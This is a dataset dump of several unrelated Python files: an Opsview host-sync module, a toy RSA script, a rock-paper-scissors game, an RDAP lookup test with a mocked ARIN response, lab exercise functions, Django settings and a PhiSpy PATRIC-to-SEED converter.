update_info_opsview_for_device(self, dev, update_host_attribute=False):\n \"\"\"\n :param dev: device information from inside\n :return: None\n \"\"\"\n\n object_type = 'host'\n json_filter = '{\"ip\":{\"-like\":\"%s\"}}'\n # url_filter='row=all&cols=name,ip,hostgroup'\n url_filter = None\n\n # Get all information for get record mapping of noc planning\n province = dev['KhuVuc']\n device_type = dev['DeviceType']\n main_depart = dev['MainDepart']\n dev_ip = dev['IP']\n mapping = None\n\n try:\n logger.debug(dev)\n\n # Get information mapping of Noc\n mapping = plannings.get_planning_from_inside_info(province=province, device_type=device_type,\n main_depart=main_depart)\n opsview_client = self.get_opsview_client(opsview_ip=mapping.opsview_server.ip)\n\n # Get host information from opsview using api\n result = opsview_client.get_generic_list(object_type=object_type, json_filter=json_filter % dev_ip,\n url_filter=url_filter)\n # Get total record of result\n result_len = int(result['summary']['totalrows'])\n\n # Create new device\n if result_len == 0:\n # Mapping json for new inside dev with default json template\n template_json = DataMapping.mapping_to_opsview_json(inside_device=dev, mapping=mapping,\n template=self.template_json,\n update_host_attribute=update_host_attribute)\n\n logger.debug('new template: %s' % jsonload.get_json_string_from_dict(template_json))\n data = opsview_client.insert_host(host=template_json)\n logger.debug('inserted data: %s' % jsonload.get_json_string_from_dict(data))\n\n # Check host group of all result hosts\n updated_list = []\n if result_len >= 1:\n\n # Get list host have same host group with mapping record\n for host in result['list']:\n # If have same host group name\n if host['hostgroup']['name'] == mapping.host_group:\n updated_list.append(host)\n\n # error when configure host. On one host group have two same ip's device\n if len(updated_list) > 1:\n msg = 'more one host on hostgroup: %s' % updated_list\n logger.warn(msg)\n raise AmbiguousHost(msg=msg)\n\n else:\n # Add new device\n if len(updated_list) == 0:\n # Mapping inside dev to opsview json\n template_json = DataMapping.mapping_to_opsview_json(inside_device=dev, mapping=mapping,\n template=self.template_json,\n update_host_attribute=update_host_attribute)\n\n logger.debug('new template: %s' % jsonload.get_json_string_from_dict(template_json))\n data = opsview_client.insert_host(host=template_json)\n logger.debug('inserted data: %s' % jsonload.get_json_string_from_dict(data))\n\n else:\n # update device\n # Get only one dev in updated_list\n updated_dev = dict(updated_list.pop(0))\n temp = dict(updated_dev)\n # logger.info(updated_dev['name'])\n\n logger.debug('result api: %s' % jsonload.get_json_string_from_dict(updated_dev))\n\n temp_json = {}\n temp_json.setdefault('object', dict(updated_dev))\n\n # Get update json template from inside dev information\n updated_template_json = DataMapping.mapping_to_opsview_json(inside_device=dev,\n template=temp_json, mapping=mapping,\n update_host_attribute=update_host_attribute)\n\n result = updated_template_json['object']\n\n logger.debug('result before call mapping_to_opsview_json function: %s'\n % jsonload.get_json_string_from_dict(updated_dev))\n\n logger.debug('result update: %s' % jsonload.get_json_string_from_dict(result))\n\n logger.debug('template_json_compare: %s' % (updated_dev == result))\n\n # Compare two json opsview\n is_same = jsonload.is_same_dict(updated_dev, result)\n\n # Update device\n if not is_same:\n # Mapping from exist template json of host\n # host_id = 24411\n host_id = updated_dev['id']\n\n # Remove ip and ref key in dict\n '''\n if 'ip' in updated_dev:\n del updated_dev['ip']\n\n if 'ref' in updated_dev:\n del updated_dev['ref']\n '''\n\n logger.debug('backup template: %s' %\n jsonload.get_json_string_from_dict({'object': updated_dev}))\n\n '''\n host_attributes = updated_template_json['object']['hostattributes']\n logger.debug(host_attributes)\n for row in host_attributes:\n logger.debug(row)\n '''\n\n logger.debug(\n 'updated_template: %s' % jsonload.get_json_string_from_dict(updated_template_json))\n data = opsview_client.update_host(host_id=host_id, updated_data=updated_template_json)\n logger.debug('updated data: %s' % jsonload.get_json_string_from_dict({'object': data}))\n else:\n pass\n # Do nothing\n logger.debug(jsonload.get_json_string_from_dict(dev))\n logger.debug(jsonload.get_json_string_from_dict(updated_dev))\n logger.debug(jsonload.get_json_string_from_dict(updated_template_json))\n\n # Get attribute host of all template\n\n '''\n host_attributes = updated_template_json['object']['hostattributes']\n for row in host_attributes:\n for key in row:\n if key == 'value':\n logger.debug('%s: %s' % (key, row[key]))\n '''\n\n # Token was be expired\n except OpsviewExpiredTokenError:\n # Delete opsview_client instance, in the next time for get opsview_client, it will be created new.\n if mapping is not None:\n del self.opsviewclients[mapping.opsview_server.ip]\n raise\n\n except (PlanningError, OpsViewError):\n raise\n\n # Update inside dev list\n def auto_mapping(self, province=None, start=None, end=None, update_host_attributes=False):\n \"\"\"\n :param update_host_attributes: run script and update result\n :param end: position start of device list\n :param start: position end of device list\n :param province: If province, function will map all dev in all province.\n If province is None, only map dev which in that province\n :return: None\n \"\"\"\n\n if start is None:\n start = 0\n\n if end is None:\n end = len(self.devices)\n\n error_dev_list = []\n # for dev in self.devices:\n for index in range(start, end):\n logger.debug('index: %s' % index)\n dev = self.devices[index]\n\n # Check valid IP\n if DataMapping.is_valid_ip(dev['IP']) is False:\n logger.warning('invalid ip: %s' % jsonload.get_json_string_from_dict(dev))\n continue\n\n if DataMapping.is_valid_name(dev['TenThietBi']) is False:\n logger.warning('invalid name: %s' % jsonload.get_json_string_from_dict(dev))\n continue\n\n # If specify province, only update device for that province\n if province is not None:\n if dev['KhuVuc'] != province:\n continue\n\n # Update device\n try:\n self.update_info_opsview_for_device(dev, update_host_attribute=update_host_attributes)\n except OpsviewExpiredTokenError as ex:\n # Expire token\n logger.warning(ex)\n logger.warning('expirted token: %s' % jsonload.get_json_string_from_dict(dev))\n apilog.write_api_log(device_info=dev, description=ex.msg, status='error',\n device_name=dev['TenThietBi'], error_code=ex.error, action='auto')\n\n except (PlanningError, OpsViewError) as ex:\n # Error when process mapping\n logger.error(ex)\n logger.error('%s: %s' % (index, dev))\n apilog.write_api_log(device_info=dev, description=ex.msg, status='error',\n device_name=dev['TenThietBi'], error_code=ex.error, action='auto')\n # Add to error dev list\n error_dev_list.append(dev)\n continue\n\n # Log inside list can't mapping\n logger.error(jsonload.get_json_string_from_dict({'error_dev': error_dev_list}))\n # jsonload.export_json_to_file(error_dev_list, 'error_dev')\n\n\ndef test_syncdb_between_mapping_opsview():\n try:\n mapping_list = plannings.get_mapping_list()\n error_mapping_list = []\n for mapping in mapping_list:\n error = True\n try:\n icons.get_icon_using_name(name=mapping.icon, db_name=dbroute.get_opsview_database(\n mapping.opsview_server.ip))\n\n hostgroups.get_host_group(name=mapping.host_group,\n db_name=dbroute.get_opsview_database(mapping.opsview_server.ip))\n\n hosttemplates.get_host_template(name=mapping.host_template,\n db_name=dbroute.get_opsview_database(mapping.opsview_server.ip))\n\n monitoringservers.get_monitoring_server(name=mapping.monitor_by,\n db_name=dbroute.get_opsview_database(mapping.opsview_server.ip))\n\n except IconError as ex:\n logger.error(ex)\n error = False\n except HostGroupError as ex:\n logger.error(ex)\n error = False\n except HostTemplateError as ex:\n logger.error(ex)\n error = False\n except MonitoringServerError as ex:\n logger.error(ex)\n error = False\n\n if error is False:\n error_mapping_list.append(mapping)\n logger.error('province: %s, device_type: %s, main_depart: %s' %\n (mapping.province, mapping.device_type, mapping.main_depart))\n\n for row in error_mapping_list:\n logger.error('province: %s, device_type: %s, main_depart: %s' %\n (row.province, row.device_type, row.main_depart))\n\n\n except (PlanningError, OpsviewConnectionNotFound) as ex:\n logger.error(ex)\n","sub_path":"utils/dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":42989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"168972384","text":"p = 47\nq = 71\n\nn = p * q\nflux = (p - 1) * (q - 1)\neKey = 79\n\n\n# prima gen\nlower = 1 \nupper = 20\nprint(\"Bilangan prima antara\",lower,\"and\",upper,\":\") \n# for num in range(lower,upper + 1): \n# if num > 1: \n# for i in range(2,num): \n# if (num % i) == 0: \n# break \n# else: \n# print(num)\n\nfor num in range(lower , upper + 1):\n if num > 1:\n for i in range(2,num):\n if(num & i) == 0:\n break\n else:\n print(num)\n # bangkitkan key public (e)\n # if i relatif flux:\n \n# bangkitkan nilai e tanpa random\n# !bisa di bagi 1 - 10 termasuk bilangan prima\n# z = 5 % 2\n# print(z)\n# initNilai = 0\n# if()\n# print(p,q,n,flux)\n\n# for i in range(flux):\n# # print(i)\n# if i > 1:\n# # print(i)\n# if (eKey * i) % flux == 1:\n# print(\"nilai\",i)\n\n\n# p = 1019 * 79\n# print(p)\n ","sub_path":"RSA/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"223323043","text":"import random\n\ndef play(user):\n print('=' * 20)\n # com choice\n com = random.choice(['r', 'p', 's'])\n\n print(f'You: {get_choice(user)} VS COM: {get_choice(com)}')\n print('=' * 20)\n if user == com:\n return ('t', 'It\\'s a tie') \n if is_win(user, com):\n return ('w', 'You Win!')\n return ('l' ,'You Lost!')\n \ndef is_win(p1, p2):\n if (p1 == 'r' and p2 == 's') or (p1 == 's' and p2 == 'p') or (p1 == 'p' and p2 == 'r'):\n return True\n return False\n\ndef get_choice(choice):\n if choice == 'r':\n return 'Rock'\n if choice == 'p':\n return 'Paper'\n if choice == 's':\n return 'Scissors'\n\nprint('=' * 20)\nprint('Rock Paper Scissors Game')\n\nwin = 0\nlost = 0\ntie = 0\n\nulang = 'y'\nwhile ulang == 'y':\n print('=' * 20)\n user = input('What\\'s your choice ? | rock(r), paper(p), scissors(s) : ').lower()\n if user != 'r' and user != 'p' and user != 's':\n print('Choice Not Found! Please select the right choice!')\n continue\n\n status, msg = play(user)\n\n if status == 'w':\n win += 1\n elif status == 'l':\n lost += 1\n elif status == 't':\n tie += 1\n \n print(msg)\n print('=' * 20)\n print(f'Score (win : lost : tie) | {win} : {lost} : {tie}')\n print('=' * 20)\n ulang = input('Try Again ? | yes(y), no(n) : ').lower()","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"59387532","text":"import pytest\nimport requests_mock\nimport rdap_lookup\n\n\n@pytest.fixture()\ndef response():\n return {\n \"rdapConformance\": [\"rdap_level_0\", \"cidr0\", \"arin_originas0\"],\n \"notices\": [{\n \"title\": \"Terms of Service\",\n \"description\": [\"By using the ARIN RDAP/Whois service, you are agreeing to the RDAP/Whois Terms of Use\"],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"about\",\n \"type\": \"text/html\",\n \"href\": \"https://www.arin.net/resources/registry/whois/tou/\"\n }]\n }, {\n \"title\": \"Whois Inaccuracy Reporting\",\n \"description\": [\"If you see inaccuracies in the results, please visit: \"],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"about\",\n \"type\": \"text/html\",\n \"href\": \"https://www.arin.net/resources/registry/whois/inaccuracy_reporting/\"\n }]\n }, {\n \"title\": \"Copyright Notice\",\n \"description\": [\"Copyright 1997-2021, American Registry for Internet Numbers, Ltd.\"]\n }],\n \"handle\": \"NET-8-8-4-0-1\",\n \"startAddress\": \"8.8.4.0\",\n \"endAddress\": \"8.8.4.255\",\n \"ipVersion\": \"v4\",\n \"name\": \"LVLT-GOGL-8-8-4\",\n \"type\": \"ALLOCATION\",\n \"parentHandle\": \"NET-8-0-0-0-1\",\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2014-03-14T16:52:03-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2014-03-14T16:52:03-04:00\"\n }],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/ip/8.8.4.0\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/net/NET-8-8-4-0-1\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"up\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/ip/8.0.0.0/9\"\n }],\n \"entities\": [{\n \"handle\": \"GOGL\",\n \"vcardArray\": [\"vcard\", [[\"version\", {}, \"text\", \"4.0\"], [\"fn\", {}, \"text\", \"Google LLC\"], [\"adr\", {\n \"label\": \"1600 Amphitheatre Parkway\\nMountain View\\nCA\\n94043\\nUnited States\"\n }, \"text\", [\"\", \"\", \"\", \"\", \"\", \"\", \"\"]], [\"kind\", {}, \"text\", \"org\"]]],\n \"roles\": [\"registrant\"],\n \"remarks\": [{\n \"title\": \"Registration Comments\",\n \"description\": [\n \"Please note that the recommended way to file abuse complaints are located in the following links. \",\n \"\", \"To report abuse and illegal activity: https://www.google.com/contact/\", \"\",\n \"For legal requests: http://support.google.com/legal \", \"\", \"Regards, \", \"The Google Team\"]\n }],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/entity/GOGL\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/org/GOGL\"\n }],\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2019-10-31T15:45:45-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2000-03-30T00:00:00-05:00\"\n }],\n \"entities\": [{\n \"handle\": \"ABUSE5250-ARIN\",\n \"vcardArray\": [\"vcard\", [[\"version\", {}, \"text\", \"4.0\"], [\"adr\", {\n \"label\": \"1600 Amphitheatre Parkway\\nMountain View\\nCA\\n94043\\nUnited States\"\n }, \"text\", [\"\", \"\", \"\", \"\", \"\", \"\", \"\"]], [\"fn\", {}, \"text\", \"Abuse\"], [\"org\", {}, \"text\", \"Abuse\"],\n [\"kind\", {}, \"text\", \"group\"],\n [\"email\", {}, \"text\", \"network-abuse@google.com\"], [\"tel\", {\n \"type\": [\"work\", \"voice\"]\n }, \"text\", \"+1-650-253-0000\"]]],\n \"roles\": [\"abuse\"],\n \"remarks\": [{\n \"title\": \"Registration Comments\",\n \"description\": [\n \"Please note that the recommended way to file abuse complaints are located in the following links.\",\n \"\", \"To report abuse and illegal activity: https://www.google.com/contact/\", \"\",\n \"For legal requests: http://support.google.com/legal \", \"\", \"Regards,\", \"The Google Team\"]\n }, {\n \"title\": \"Unvalidated POC\",\n \"description\": [\n \"ARIN has attempted to validate the data for this POC, but has received no response from the POC since 2019-10-24\"]\n }],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/entity/ABUSE5250-ARIN\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/poc/ABUSE5250-ARIN\"\n }],\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2018-10-24T11:23:55-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2015-11-06T15:36:35-05:00\"\n }],\n \"port43\": \"whois.arin.net\",\n \"objectClassName\": \"entity\"\n }, {\n \"handle\": \"ZG39-ARIN\",\n \"vcardArray\": [\"vcard\", [[\"version\", {}, \"text\", \"4.0\"], [\"adr\", {\n \"label\": \"1600 Amphitheatre Parkway\\nMountain View\\nCA\\n94043\\nUnited States\"\n }, \"text\", [\"\", \"\", \"\", \"\", \"\", \"\", \"\"]], [\"fn\", {}, \"text\", \"Google LLC\"],\n [\"org\", {}, \"text\", \"Google LLC\"], [\"kind\", {}, \"text\", \"group\"],\n [\"email\", {}, \"text\", \"arin-contact@google.com\"], [\"tel\", {\n \"type\": [\"work\", \"voice\"]\n }, \"text\", \"+1-650-253-0000\"]]],\n \"roles\": [\"technical\", \"administrative\"],\n \"links\": [{\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"self\",\n \"type\": \"application/rdap+json\",\n \"href\": \"https://rdap.arin.net/registry/entity/ZG39-ARIN\"\n }, {\n \"value\": \"https://rdap.arin.net/registry/ip/8.8.4.4/24\",\n \"rel\": \"alternate\",\n \"type\": \"application/xml\",\n \"href\": \"https://whois.arin.net/rest/poc/ZG39-ARIN\"\n }],\n \"events\": [{\n \"eventAction\": \"last changed\",\n \"eventDate\": \"2019-10-30T07:05:21-04:00\"\n }, {\n \"eventAction\": \"registration\",\n \"eventDate\": \"2000-11-30T13:54:08-05:00\"\n }],\n \"status\": [\"validated\"],\n \"port43\": \"whois.arin.net\",\n \"objectClassName\": \"entity\"\n }],\n \"port43\": \"whois.arin.net\",\n \"objectClassName\": \"entity\"\n }],\n \"port43\": \"whois.arin.net\",\n \"status\": [\"active\"],\n \"objectClassName\": \"ip network\",\n \"cidr0_cidrs\": [{\n \"v4prefix\": \"8.8.4.0\",\n \"length\": 24\n }],\n \"arin_originas0_originautnums\": []\n }\n\n\ndef test_lookup_info(response):\n ip = \"8.8.4.4\"\n with requests_mock.Mocker() as m:\n m.get(\"https://rdap.arin.net/registry/ip/8.8.4.4/24\", json=response)\n result = rdap_lookup.perform_rdap_lookup([ip], 1)\n assert {ip: response} == result\n","sub_path":"test/test_rdap_lookup.py","file_name":"test_rdap_lookup.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"593144723","text":"## import modules here \n\n################# Question 0 #################\n\ndef add(a, b): # do not change the heading of the function\n return a + b\n\n\n################# Question 1 #################\n\ndef nsqrt(x): # do not change the heading of the function\n #pass # **replace** this line with your code\n i=1\n while abs(i*i-x)>1e-9:\n i=(i+x/i)/2\n #print(i)\n return int(i)\n\n\n################# Question 2 #################\n\n\n# x_0: initial guess\n# EPSILON: stop when abs(x - x_new) < EPSILON\n# MAX_ITER: maximum number of iterations\n\n## NOTE: you must use the default values of the above parameters, do not change them\n\ndef find_root(f, fprime, x_0=1.0, EPSILON = 1E-7, MAX_ITER = 1000): # do not change the heading of the function\n #pass # **replace** this line with your code\n x = x_0\n x_new = x_0\n while MAX_ITER>0:\n x=x_new\n x_new = x - f(x)/fprime(x)\n if abs(x-x_new)0:\n for child in root.children:\n #print(count)\n count_depth(child,count+1,l)\n \ndef max_depth(root): # do not change the heading of the function\n #pass # **replace** this line with your code\n l=[]\n count = 1\n count_depth(root,count,l)\n #print(l)\n return max(l)\n","sub_path":"9318 Dataming and DataWarehouse/Lab/Lab1/Lab1_specs/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"103408776","text":"\"\"\"\nDjango settings for opencpm project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nALLOWED_HOSTS = []\n\n# Add request object to template contexts\nfrom django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP\nTEMPLATE_CONTEXT_PROCESSORS = TCP + [\n 'django.core.context_processors.request',\n]\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates'),\n)\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'rest_framework',\n 'notifications',\n\n 'apps.chat',\n 'apps.courses',\n 'apps.events',\n 'apps.files',\n 'apps.tasks',\n 'apps.users',\n 'apps.user_tracking',\n 'apps.webapp',\n 'apps.stats',\n 'apps.notifications_api',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'apps.user_tracking.middleware.UserTrackingMiddleware',\n 'libs.request_cache.middleware.RequestCacheMiddleware',\n)\n\nROOT_URLCONF = 'opencpm.urls'\n\nWSGI_APPLICATION = 'opencpm.wsgi.application'\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n# Authentication URLs\nLOGIN_URL = '/app/login'\nLOGIN_REDIRECT_URL = '/app'\n\n# REST framework setup\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n 'libs.permissions.rest.ObjectPermissions',\n ),\n 'DEFAULT_FILTER_BACKENDS': (\n 'libs.permissions.rest.ObjectPermissionsFilter',\n 'rest_framework.filters.DjangoFilterBackend',\n 'rest_framework.filters.OrderingFilter'\n ),\n 'PAGINATE_BY_PARAM': 'page_size',\n}\n\n# django-pipeline config\nINSTALLED_APPS += (\n 'pipeline',\n)\n\nSTATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'\nfrom django.conf.global_settings import STATICFILES_FINDERS as STATICFILES_FINDERS_DEFAULT\nSTATICFILES_FINDERS = STATICFILES_FINDERS_DEFAULT + [\n 'pipeline.finders.PipelineFinder',\n]\n\nPIPELINE = {\n 'JS_COMPRESSOR': 'pipeline.compressors.jsmin.JSMinCompressor',\n 'CSS_COMPRESSOR': 'pipeline.compressors.cssmin.CSSMinCompressor',\n 'CSSMIN_BINARY': 'cssmin',\n 'JAVASCRIPT': {\n 'app': {\n 'source_filenames': (\n 'js/app/app.js',\n 'js/app/chat.js',\n 'js/app/custom_filter.js',\n 'js/app/events.js',\n 'js/app/files.js',\n 'js/app/navfilter.js',\n 'js/app/notifications.js',\n 'js/app/repositories.js',\n 'js/app/stats.js',\n 'js/app/tasks.js',\n 'js/app/users.js',\n ),\n 'output_filename': 'js/app.js',\n },\n 'vendor': {\n 'source_filenames': (\n 'bower_components/jquery/dist/jquery.js',\n 'bower_components/underscore/underscore.js',\n 'bower_components/moment/moment.js',\n 'bower_components/fullcalendar/dist/fullcalendar.js',\n 'bower_components/angular/angular.js',\n 'bower_components/angular-cookies/angular-cookies.js',\n 'bower_components/angular-ui-router/release/angular-ui-router.js',\n 'bower_components/angular-bootstrap/ui-bootstrap-tpls.js',\n 'bower_components/angular-ui-indeterminate/dist/indeterminate.js',\n 'bower_components/angular-ui-calendar/src/calendar.js',\n 'bower_components/angular-file-upload/dist/angular-file-upload.js',\n 'bower_components/angular-google-chart/ng-google-chart.js',\n ),\n 'output_filename': 'js/vendor.js',\n }\n },\n 'STYLESHEETS': {\n 'app': {\n 'source_filenames': (\n 'css/bootstrap.css',\n 'bower_components/font-awesome/css/font-awesome.min.css',\n 'css/style.css',\n 'css/style-responsive.css',\n 'bower_components/fullcalendar/dist/fullcalendar.css',\n 'css/app.css',\n ),\n 'output_filename': 'css/app_all.css'\n }\n }\n}\n\n# Other settings\nSITE_NAME = 'OpenCPM'\n\nFILE_THUMBNAIL_CACHE_TIMEOUT = 5*60 # Number of seconds to cache Dropbox thumbnails\nFILE_METADATA_CACHE_TIMEOUT = 60*60 # Number of seconds to cache Dropbox file metadata\n\n# Django-RT settings\nRT_SSE_HEARTBEAT = 30\n\n# HACK: this fixes https://github.com/tomchristie/django-rest-framework/issues/2763\nimport django.core.handlers.wsgi as wsgi\nfrom django.utils.six.moves.http_client import responses\nwsgi.STATUS_CODE_TEXT = responses\n","sub_path":"opencpm/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"648598963","text":"#!/usr/bin/env python\n#############################################################################################\n## PhiSpy is a computer program written in C++, Python and R to \n## identify prophages in a complete bacterial genome sequences.\n##\n## Initial versions of PhiSpy were written by\n## Sajia Akhter (sajia@stanford.edu) PhD Student Edwards Bioinformatics Lab \n## (http://edwards.sdsu.edu/labsite/), Computational Science Research Center \n## (http://www.csrc.sdsu.edu/csrc/), San Diego State University (http://www.sdsu.edu/)\n##\n## Improvements, bug fixes, and other changes were made by\n## Katelyn McNair Edwards Bioinformatics Lab (http://edwards.sdsu.edu/labsite/) \n## San Diego State University (http://www.sdsu.edu/)\n## \n## The MIT License (MIT)\n## Copyright (c) 2016 Rob Edwards\n## Permission is hereby granted, free of charge, to any person obtaining a copy\n## of this software and associated documentation files (the \"Software\"), to deal\n## in the Software without restriction, including without limitation the rights\n## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n## copies of the Software, and to permit persons to whom the Software is\n## furnished to do so, subject to the following conditions:\n## \n## The above copyright notice and this permission notice shall be included in all\n## copies or substantial portions of the Software.\n## \n## THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n## SOFTWARE.\n## \n## Improvements, bug fixes and other changes (2019) were made by forking the github version: \n## - Conversion from python2 -> python3\n## - Add prophage.tbl\n## - Simplification of code and integration into BacterialGenotyper\n##\n#############################################################################################\n\"\"\"\nConvert a tab file from PATRIC to a the SEED files that we need for PhiSpy\n\nWe need the following files:\n\n1. assigned_functions - a tab separated list of FIG ID and function\n2. contigs - the fasta DNA sequence. Note we may download this separately\n3. genome - the name of the genome -- may not be required\n4. taxonomy - the taxonomy of the genome -- may not be required\n5. taxonomy_id - the tax id. -- also may not be required\n6. Features/peg/tbl - the tbl that has id,contig_start_stop, [alt ids]\n7. Features/rna/tbl - the RNA genes\n\n\nThe files that PhiSpy opens are:\n\na. dir/contigs\nb. dir/Features/peg/tbl\nc. dir/assigned_functions\nd. dir/Features/rna/tbl\n\n\n\"\"\"\n\nimport os\nimport sys\nimport argparse\n\n#################################################\ndef parse_tab(filename, outputdir):\n\t\"\"\"\n\tParse a patric tab file\n\t:param filename: the file to parse\n\t:return: ummm\n\t\"\"\"\n\n\tif not (os.path.exists(os.path.join(outputdir, \"Features\"))):\n\t\tos.mkdir(os.path.join(outputdir, \"Features\"))\n\tif not (os.path.exists(os.path.join(outputdir, \"Features/peg\"))):\n\t\tos.mkdir(os.path.join(outputdir, \"Features/peg\"))\n\tif not (os.path.exists(os.path.join(outputdir, \"Features/rna\"))):\n\t\tos.mkdir(os.path.join(outputdir, \"Features/rna\"))\n\n\tpeg = open(os.path.join(outputdir, \"Features/peg/tbl\"), 'w')\n\trna = open(os.path.join(outputdir, \"Features/rna/tbl\"), 'w')\n\tasf = open(os.path.join(outputdir, \"assigned_functions\"), 'w')\n\n\twrote_genome = False\n\n\twith open(filename, 'r') as fin:\n\t\tfor l in fin:\n\t\t\tif l.startswith('genome_id'):\n\t\t\t\tcontinue\n\n\t\t\t# genome_id\tgenome_name\taccession\tannotation\tfeature_type\tpatric_id\trefseq_locus_tag\talt_locus_tag\n\t\t\t# uniprotkb_accession\tstart\tend\tstrand\tna_length\tgene\tproduct\tfigfam_id\tplfam_id\tpgfam_id\n\t\t\t# go\tec\tpathway\n\t\t\tl = l.replace(\"\\n\", \"\") # this is a hack because I can't figure out how to do chomp\n\t\t\tp = l.split(\"\\t\")\n\n\t\t\tif not wrote_genome:\n\t\t\t\twith open(os.path.join(outputdir, \"GENOME\"), 'w') as gout:\n\t\t\t\t\tgout.write(\"{}\\n\".format(p[1]))\n\t\t\t\twrote_genome = True\n\n\t\t\tgid, name, acc, who, ftype, fid, refseq_locus, alt, uni, start, stop, strand, length, gene, prod, ffid, plid, pgid, go, ec, pw = p\n\n\t\t\tif start > stop:\n\t\t\t\t(start, stop) = (stop, start)\n\n\t\t\tif \"CDS\" in p[4]:\n\t\t\t\tpeg.write(\"{}\\t{}_{}_{}\\n\".format(fid, acc, start, stop))\n\t\t\t\tasf.write(\"{}\\t{}\\n\".format(fid, prod))\n\t\t\telif \"rna\" in p[4].lower():\n\t\t\t\trna.write(\"{}\\t{}_{}_{}\\n\".format(fid, acc, start, stop))\n\tpeg.close()\n\trna.close()\n\tasf.close()\n\n#################################################\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description=\"Convert a patric tab file to a minimal seed directory\")\n\tparser.add_argument('-f', help='The patric tab file', required=True)\n\tparser.add_argument('-o', help='output directory', required=True)\n\tparser.add_argument('-v', help='verbose output', action=\"store_true\")\n\targs = parser.parse_args()\n\n\tif not os.path.exists(args.o):\n\t\tos.mkdir(args.o)\n\n\tparse_tab(args.f, 